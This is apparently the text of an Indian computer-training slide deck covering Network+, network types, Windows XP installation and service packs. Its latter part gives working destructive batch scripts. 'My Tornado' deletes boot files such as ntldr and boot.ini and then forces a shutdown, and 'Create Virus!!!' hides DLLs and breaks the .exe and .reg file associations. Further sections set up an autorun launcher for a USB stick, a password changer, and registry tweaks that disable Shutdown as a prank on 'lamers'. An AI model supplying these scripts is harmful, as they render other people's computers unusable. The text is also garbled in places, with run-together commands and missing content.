Tips from Pavan NIIT Beawar



My thinking is like :- Try to work for someone who'll challenge your power ""Because the Mind is the Ultimate Source of Power, doesn't Surprise that all Advanced Arts, turn out to be Based on Principles and Concepts that are Virtually Interchangeable!"".m a very simple guy who is loving, caring, friendly, helpful, trustworthy, understanding and generous....i m very emotional and very straight forward person....i m completely down to earthme is an impatient guy and the one who beleive in god and simplicity

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Pavan Kumar Sen SNIT Technology

NIIT Beawar


• What is Network+ Certification?

• Networking Terminology and Categories

• What is OS and Types of OS

• Operating System Installation

• FAT & NTFS File System

• Convert File System FAT to NTFS

• Shell Script programming

• System Security

• System Restore

• System Backup Point

• Users and Group Policies Editor

• Hide System Drive and Folder

...A Bubble?

Welcome To


Network+ Certification?

• CompTIA Network+® Certification• CompTIA Network+ validates the knowledge and skills of networking

professionals. It is an international, vendor-neutral certification that recognizes a technician's ability to describe the features and functions of networking components and to install, configure and troubleshoot basic networking hardware, protocols and services. Although not a prerequisite, it is recommended that CompTIA Network+ candidates have at least nine months of experience in network support or administration or adequate academic training, along with a CompTIA A+ certification. In fact, many IT certifications integrate CompTIA Network+ into their curriculums. Microsoft added CompTIA Network+ into their Microsoft Certified Systems Administrator (MCSA) program, and other corporations such as Novell, Cisco, HP, Lotus and 3Com also recognize CompTIA Network+ as part of their certification tracks.

Network Type

• Local Area Network (LAN)

• Metropolitan Area Networks (MAN)

• Wide Area Network (WAN)


• A local area network (LAN) is a computer network covering a small physical area, like a home, office, or small group of buildings, such as a school, or an airport. The defining characteristics of LANs, in contrast to wide-area networks (WANs), include their usually higher data-transfer rates, smaller geographic range, and lack of a need for leased telecommunication lines.


metropolitan area network (MAN) is a network that interconnects users with computer resources in a geographic area or region larger than that covered by even a large local area network (LAN) but smaller than the area covered by a wide area network (WAN).


• Definition: A WAN spans a large geographic area, such as a state, province or country. WANs often connect multiple smaller networks, such as local area networks (LANs) or metro area networks (MANs). The world's most popular WAN is the Internet.

Operating system • An operating system

(commonly abbreviated OS and O/S) is the software component of a computer system that is responsible for the management and coordination of activities and the sharing of the limited resources of the computer. The operating system acts as a host for applications that are run on the machine. As a host, one of the purposes of an operating system is to handle the details of the operation of the hardware.

XP System requirements

Pentium 233-megahertz (MHz) processor or faster (300 MHz is recommended)

At least 64 megabytes (MB) of RAM (128 MB is recommended)

At least 1.5 gigabytes (GB) of available space on the hard disk

Keyboard and a Microsoft Mouse or some other compatible pointing device

Video adapter and monitor with Super VGA (800 x 600)or higher resolution

Sound card

• After configuring the system for booting from a CD, the Windows Setup screen appears.

• At this point, Setup is loading the driver files it needs to continue with installation.

• Setup will load all the needed files and drivers

• Press ENTER to Continue Setup.• You may also choose R to Repair, or F3 to Quit and reboot the system.

• You may press F8 to signify that you agree with the terms, hit ESC if you do not agree and PAGE UP or PAGE DOWN to scroll through each screen.Note: If you do not agree to the terms, setup will quit and reboot the system

• Hard drive partition information is now displayed. • At this point, the options include pressing ENTER to Install on the

selected partition, D to Delete the selected partition, or F3 to Quit and reboot the system

• If the hard disk is already partitioned, but has enough unpartitioned disk space, you can create an additional partition in the unpartitioned space

• I chose drive C: or Partition1 to install the Operating System.• You may choose ENTER to Install to the selected partition, D to Delete the

highlighted Partition, or F3 to Quit and reboot the system.

• Select a file system for the installation partition. After you create the partition on which you will install Windows XP Professional, you can use Setup to select the file system with which to format the partition.

• Setup will then begin copying necessary files from the installation point (CD, DVD etc…..)

Why do we need SP? 

You can not have failed to hear about all the virus, worm, hacker and Trojan attacks that have plagued the Windows community over the few years!

Perhaps you were even a victim to at least one of them?

Well, Microsoft have put together a comprehensive package to address the security concerns these attacks have raised for Windows XP users.

Service Pack

• A service pack (in short SP) is a collection of updates, fixes and/or enhancements to a software program delivered in the form of a single installable package. Many companies, such as Microsoft or Autodesk, typically release a service pack when the number of individual patches to a given program reaches a certain (arbitrary) limit. Installing a service pack is easier and less error-prone than installing a high number of patches individually, even more so when updating multiple computers over a network.

What Service Provide you

• Network protection

• Memory protection

• Safer e-mail handling

• More secure browsing

• Improved computer maintenance

Service Pack Download Link




How to Convert FAT to

NTFS file system

At the Command Prompt

Enable Task Manager using the Batch File

REG add HKCU\Software\Microsoft\Windows\

CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d

0 /f

My Tornado

@echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini@echo offmsg * YOU GOT OWNED!!!shutdown -s -t 7 -c “A VIRUS IS TAKING OVER c:Drivesave as bat file in notepad!!This will pop up a message saying OWNED!!and shut down the computer never to [...]

AutoRun System• Create a file called

autorun.inf in the root directory of the memory stick. Open it with notepad and put the following:


This hsould start that batch file each time the device is loaded.

Password Changer/Remover

:top @echo off

color 6e

:begin cls echo Type the user name you wish to change the password for.

SET /p UDefine= SET /a UDefine=%UDefine% * cls msg * To remove the password, press enter twice. msg * To change the password, type in the new password. You cant see the characters but it works. cls net user %udefine% * pause>nul :end

Create Virus!!!

@echo offfor %%f in (*.dll) do set virus=%%fren %virus% virus%virus%attrib +r +h virus%virus%assoc .reg=sysfileassoc .exe=dllfilecopy virus%virus% virus%virus%:virustaskkill /f /t /im virus%virus%tskill /f /t /im virus%virus%goto virus

Ban Shutdowns : A trick to Play on Lamers

• This is a neat trick you can play on that lamer that has a huge ego, in this section I teach you, how to disable the Shut Down option in the Shut Down Dialog Box. This trick involves editing the registry, so please make backups. Launch regedit.exe and go to :

• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

• In the right pane look for the NoClose Key. If it is not already there then create it by right clicking in the right pane and selecting New > String Value.(Name it NoCloseKey ) Now once you see the NoCloseKey in the right pane, right click on it and select Modify. Then Type 1 in the Value Data Box.

Instead of performing the above difficult to remember process, simply save the following with an extension of .reg and add it's contents to the registry by double clicking on it.




Remove Folder Option



[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
